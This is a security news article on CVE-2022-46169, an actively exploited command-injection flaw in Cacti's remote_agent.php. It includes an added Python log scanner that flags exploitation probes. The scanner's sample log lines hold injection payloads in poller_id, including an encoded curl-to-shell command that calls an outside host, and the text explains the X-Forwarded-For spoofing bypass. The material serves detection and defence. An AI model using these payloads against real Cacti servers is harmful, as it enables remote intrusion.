Thousands of internet-exposed Cacti installations are vulnerable to a critical security flaw that is being actively used in attacks, security researchers have warned.
Cacti is an open-source web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool.
The vulnerability, tracked as CVE-2022-46169, is an improper authorization issue in Cacti's remote agent (remote_agent.php) that lets an unauthenticated remote attacker execute arbitrary OS commands on the server by sending a specially crafted HTTP request to the affected instance. The endpoint's only access control is a check that the client's address matches the hostname of a configured poller, and because Cacti derives that address from attacker-controlled headers such as X-Forwarded-For, the check can be spoofed; the poll_for_data action then passes the unsanitized poller_id parameter into a shell command, giving command injection. Per the Cacti advisory, exploitation requires that a monitored device uses a script-type data source, which is common in real deployments. The security issue affects versions 1.2.22 and below.
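A defender's first question is whether anyone has already probed their instance. The following added example (not code from the article or from the Cacti project) scans web-server access log lines in Apache combined format and flags requests to remote_agent.php whose poll_for_data action carries a poller_id that is anything other than a plain integer, which is the shape exploitation attempts for this bug take. The log lines, IP addresses and paths are constructed for the example; the `local_data_ids[]` parameter in them is assumed.

```python
"""Flag access-log lines that look like CVE-2022-46169 probes against Cacti.

Heuristic: a request to remote_agent.php with action=poll_for_data whose
poller_id is not a small integer (shell metacharacters, command substitution,
encoded payloads) is suspicious. Only GET requests are visible here; a POST
body carrying the same parameters would not appear in a combined-format log.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jan/2023:10:15:01 +0000] "GET /cacti/remote_agent.php?action=poll_for_data&host_id=1&local_data_ids[]=6&poller_id=1 HTTP/1.1" 200 231 "-" "curl/7.81.0"
203.0.113.9 - - [03/Jan/2023:10:15:02 +0000] "GET /cacti/remote_agent.php?action=poll_for_data&host_id=1&local_data_ids[]=6&poller_id=1%3Bid HTTP/1.1" 200 412 "-" "python-requests/2.28"
203.0.113.9 - - [03/Jan/2023:10:15:03 +0000] "GET /cacti/remote_agent.php?action=poll_for_data&host_id=1&local_data_ids[]=6&poller_id=%60curl+http%3A%2F%2F203.0.113.9%2Fx%7Csh%60 HTTP/1.1" 200 412 "-" "python-requests/2.28"
192.0.2.4 - - [03/Jan/2023:10:15:04 +0000] "GET /cacti/graph_view.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_poller_ids(target):
    """Return the decoded poller_id values that do not look like a legitimate
    poller ID, for a request target hitting remote_agent.php's poll_for_data.
    A legitimate Cacti poller ID is a positive integer; anything else is a
    candidate injection payload."""
    url = urlsplit(target)
    if not url.path.endswith("remote_agent.php"):
        return []
    qs = parse_qs(url.query, keep_blank_values=True)
    if "poll_for_data" not in qs.get("action", []):
        return []
    # parse_qs already percent-decodes once; decode again to catch
    # double-encoded payloads before judging the value.
    values = [unquote(v) for v in qs.get("poller_id", [])]
    return [v for v in values if not v.isdigit()]


def is_suspicious(target):
    return bool(suspicious_poller_ids(target))


def scan(lines):
    """Return one finding per log line that carries a suspicious poller_id."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        for pid in suspicious_poller_ids(rec["target"]):
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "status": rec["status"], "poller_id": pid})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} status={f['status']} poller_id={f['poller_id']!r}")
```

A hit with a 200 status does not by itself prove the command ran, since remote_agent.php answers the spoofed-address check before the injection point; treat any non-integer poller_id as a probe worth triaging against the host's process and outbound-connection history, and remember that the same payload sent in a POST body leaves only the path in this kind of log.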
The vulnerability was patched in early December 2022 with the release of Cacti 1.2.23, and a month later, on January 3, 2023, The Shadowserver Foundation warned that it had detected the first exploitation attempts targeting CVE-2022-46169.
Censys researchers said they identified roughly 6,400 internet-accessible Cacti hosts; of these, only 26 were running a patched version of the software.